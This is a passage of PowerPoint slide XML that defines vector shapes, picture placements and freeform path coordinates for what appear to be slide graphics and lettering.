                  <a:lnTo>
                    <a:pt x="529411" y="771464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540091" y="765390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547719" y="759315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556873" y="753241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="564501" y="745648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570604" y="753241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="578233" y="762353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585861" y="768427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595015" y="776020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604169" y="782095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613323" y="789688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624003" y="794244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="636208" y="800318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="648414" y="804874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660619" y="807911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674350" y="812467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701813" y="818542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715544" y="820061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="729275" y="820061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="744532" y="821579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="782674" y="818542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="834547" y="806393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880317" y="786651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="903203" y="768427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="913882" y="759315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935242" y="727424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="942870" y="703126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950499" y="704645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="956601" y="706163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="982538" y="706163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="991692" y="704645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002372" y="703126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011526" y="700089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020680" y="695533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035937" y="686421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042040" y="678828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049668" y="672753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1055771" y="666679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060348" y="659086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063399" y="649974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1067976" y="642381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071027" y="633269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072553" y="624157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072553" y="615045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071027" y="602896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069502" y="592266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1080182" y="593784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092387" y="595303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103067" y="596822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115272" y="596822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165620" y="589229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209864" y="571005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1255635" y="531521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1263263" y="517853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1270892" y="505704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1276994" y="492036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283097" y="461664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1284623" y="446477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283097" y="431291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1270892" y="388769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1244955" y="350803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209864" y="323468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1196133" y="314356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1180877" y="308282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165620" y="303726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148837" y="299170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115272" y="296133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1104592" y="297651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1093913" y="297651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083233" y="299170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072553" y="302207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072553" y="262723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071027" y="250574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069502" y="239943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066450" y="229313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063399" y="220201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060348" y="209571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051194" y="188310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042040" y="170086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035937" y="160974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029834" y="153381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1023731" y="144270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1016103" y="136676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010000" y="129083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002372" y="121490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="994743" y="115416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="987115" y="107822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968807" y="95673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930665" y="77450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="868112" y="63782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="857432" y="63782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837598" y="65301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819290" y="66819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800982" y="72894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="782674" y="77450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749109" y="92636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735378" y="103266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720121" y="113897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704864" y="89599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695710" y="78968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686556" y="66819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665196" y="48596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="652991" y="39484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639260" y="30372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625529" y="24298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613323" y="18223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598066" y="12149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584335" y="7593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569078" y="3037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538565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7012566E-F3CE-180E-2450-CFD36A7D0A7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2714" y="3028093"/>
              <a:ext cx="1209864" cy="754759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575BFD63-77A0-632F-00C9-C342A82C813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3046" y="2999607"/>
              <a:ext cx="1302972" cy="839469"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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5DAE81AC-8AF6-913D-11CC-D0762B22BC18}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7058986" y="3449270"/>
              <a:ext cx="979805" cy="478155"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="979804" h="478154">
                  <a:moveTo>
                    <a:pt x="638991" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="102824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="340229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340694" y="477833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979686" y="370472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979686" y="128531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638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6C5DD593-D461-F109-5CA7-E8498F2D5B1D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7401195" y="3576289"/>
              <a:ext cx="639445" cy="351155"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="639445" h="351154">
                  <a:moveTo>
                    <a:pt x="635963" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="102824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="350814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99937" y="332668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319495" y="294865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537540" y="257062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610221" y="244965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629906" y="243453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638991" y="243453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635963" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E8EBE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0050A744-1E86-5E3B-3FAB-2E5CA520BBA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8986" y="3450782"/>
              <a:ext cx="970601" cy="476321"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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186B0683-18A6-E0D3-B872-9BA89DCC444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50658" y="2919097"/>
              <a:ext cx="1400623" cy="1160247"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="object 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{993F7D59-AD04-19A4-045F-BF7F34339A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49650" y="3053092"/>
              <a:ext cx="443660" cy="491442"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="object 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43766B17-319D-6509-FE8B-19BEBEEDEFE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1543" y="3608044"/>
              <a:ext cx="198359" cy="149700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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2D3CD572-483C-6545-57B9-12F3261DBE99}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7563215" y="3249669"/>
              <a:ext cx="229235" cy="240665"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="229234" h="240664">
                  <a:moveTo>
                    <a:pt x="158990" y="3024"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="171104" y="7560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186246" y="12097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198359" y="16633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204416" y="19657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208959" y="22681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215016" y="25706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219558" y="30242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222587" y="34779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225615" y="39315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227129" y="45363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228643" y="49900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228643" y="55948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227129" y="63509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219558" y="87703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211987" y="114921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202902" y="142140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196845" y="155749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190788" y="169358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184732" y="182967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177161" y="193552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169590" y="205649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162019" y="214722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152934" y="223795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146877" y="226819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143848" y="231356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137792" y="232868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131735" y="235892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127192" y="237404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121135" y="238916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116593" y="238916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112050" y="240428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102965" y="238916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93880" y="235892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84795" y="232868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75709" y="229843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66624" y="225307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51482" y="219259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45425" y="216234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39369" y="213210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34826" y="210186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30283" y="205649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25741" y="201113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21198" y="196577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18170" y="192040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13627" y="185992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10599" y="179943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7570" y="173895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4542" y="167846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3028" y="161798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1514" y="154237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="148188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="140628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="133067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="120970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1514" y="110385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4542" y="98288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7570" y="87703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13627" y="77118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18170" y="66533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24227" y="57460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31798" y="46876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39369" y="39315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48454" y="31754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57539" y="24194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68138" y="18145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78738" y="12097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89337" y="7560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99937" y="3024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112050" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124164" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136277" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146877" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158990" y="3024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6" name="object 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C94C0C4-8616-54EE-34E7-022AFC66044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14697" y="3107528"/>
              <a:ext cx="139306" cy="193552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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6174D38F-4D27-EC03-BC8A-D48CF027422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55643" y="3097749"/>
              <a:ext cx="278612" cy="400049"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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7EFE7E3C-1EA2-68B7-D479-887CCE54D6FC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7396665" y="4099622"/>
              <a:ext cx="713105" cy="96520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="23306" y="4063"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23306" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23306" y="54620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81034" y="54620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81034" y="37144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23306" y="37144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23306" y="4063"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="81034" y="54620"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57727" y="54620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57727" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81034" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81034" y="54620"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="81034" y="4063"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57727" y="4063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57727" y="37144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81034" y="37144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81034" y="4063"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="168634" y="39319"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="135145" y="39319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139676" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145813" y="42915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147357" y="45516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147357" y="49641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140916" y="50007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134718" y="50576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100866" y="69921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100927" y="81259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103060" y="86237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111997" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112291" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117223" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126428" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128968" y="96011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147235" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131914" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129903" y="81259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127302" y="80487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126204" y="79898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125270" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124294" y="78272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123685" y="77419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123197" y="75651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123075" y="70957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123664" y="69230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147235" y="62443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="62443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168634" y="39319"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="168896" y="87213"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147235" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147235" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="87213"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="168896" y="62443"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147235" y="62443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147235" y="76606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145528" y="78049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143557" y="79227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138757" y="81117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138463" y="81117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136852" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="62443"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="133702" y="24343"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="128480" y="24343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123278" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112875" y="26415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109116" y="27127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106820" y="27736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106820" y="44175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108811" y="44175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110599" y="43484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113525" y="42509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121449" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121234" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125554" y="39319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168634" y="39319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166132" y="33893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160605" y="30073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155825" y="27566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149745" y="25775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142701" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143537" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133702" y="24343"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="230952" y="24404"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="221138" y="24404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216139" y="25054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186493" y="54274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186593" y="67177"/>
